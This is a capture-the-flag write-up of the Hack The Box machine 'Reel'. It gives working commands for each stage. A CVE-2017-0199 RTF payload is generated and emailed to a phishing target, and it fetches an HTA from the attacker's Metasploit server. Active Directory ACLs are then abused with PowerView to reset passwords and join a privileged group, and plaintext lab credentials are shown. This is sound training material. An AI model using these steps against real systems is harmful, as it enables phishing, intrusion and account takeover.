Hack The Box - Reel

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled.png

⇒ Reel is an hard active directory machine created by egre55 that teaches us :

  • CVE2017-0199
  • Decrypting files encrypted with PS.Credentials.
  • Abusing WriteOwner to give ourselves reset password perms then resetting pass
  • Abusing GenericWrite to a group

NMAP

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%201.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%202.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%203.png


Enumerating

⇒ We are able to authenticate in ftp as Anonymous user and we find the following files :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%204.png

  • readme.txt has a note about sending email with rtf documents attached

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%205.png

  • Applocker.docx has hash rules that block certain file types

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%206.png

  • Running exiftool on Windows Event Forwarding.docx we find email address

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%207.png


CVE-2017-0199 [ malicious RTF ]

⇒ So we’ll be sending email to nico@megabank.com with the malicious rtf file attached that calls to our hta file which we will be creating using metasploit.

https://github.com/bhdresh/CVE-2017-0199

  • Creating hta payload
use windows/misc/hta_server
set lhost tun0
set srvhost tun0
set lport 4444
run

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%208.png

  • Next we’ll be creating the malicious rtf file :

python cve-2017-0199_toolkit.py -M gen -t rtf -w jake.rtf -u 'http://10.10.14.8:80/5TktJBtnZ.hta'

  • Next we’ll be sending the mail to nico@megabank.com using swaks as we saw smtp port was open :

swaks --server 10.10.10.77 --from enox@megabank.com --to nico@megabank.com --header "Please click" --body "Here is the document you requested http://10.10.14.8:80/5TktJBtnZ.hta" --attach jake.rtf

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%209.png


Privilege Escalation to tom

⇒ There is cred.xml that is encrypted with PS.Credentials :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2010.png

  • We decoded it and got password for tom user :
$credential = Import-CliXml -Path C:\Users\nico\Desktop\cred.xml

$credential.GetNetworkCredential().Password

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2011.png

Tom : 1ts-mag1c!!!

⇒ We ssh’ed in as tom using the credentials :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2012.png


Privilege Escalation to claire

⇒ On tom desktop we find interesting files and a note talking about no attack paths but he only performed short path query. There’s also acls.csv file in Ingestors folder which we can load in bloodhound and enumerate

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2013.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2014.png

⇒ Loaded it up in bloodhound and found out that we have WriteOwner to claire user and claire user has GenericWrite to Backup_Admins group.

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2015.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2016.png

⇒ Abusing WriteOwner to make ourselves owner of claire and then add resetpassword rights to ourselves and change the password

# Making ourselves owner

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom

# Giving ourselves reset password rights

Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\claire -Rights ResetPassword

# Resetting the password

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass

⇒ Then we just ssh’ed in as claire :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2017.png


Privilege Escalation to Administrator

⇒ As we previously saw claire user has GenericWrite to backup_admins group so lets add our user to the group :

net group backup_admins claire /add

  • Next we go back to tom and run the reset password commands again and ssh in as claire

⇒ Now we are able to read files in Administrator folder but we can’t still read the root flag. There’s an folder Backup Scripts which contain couple of powershell scripts. One of the script has administrator password :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2018.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2019.png

administrator : Cr4ckMeIfYouC4n!

⇒ We ssh’ed in as administrator and grabbed the root flag

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Reel%20Box%2077ebbf76f666408a8f839e4db867b034/Untitled%2020.png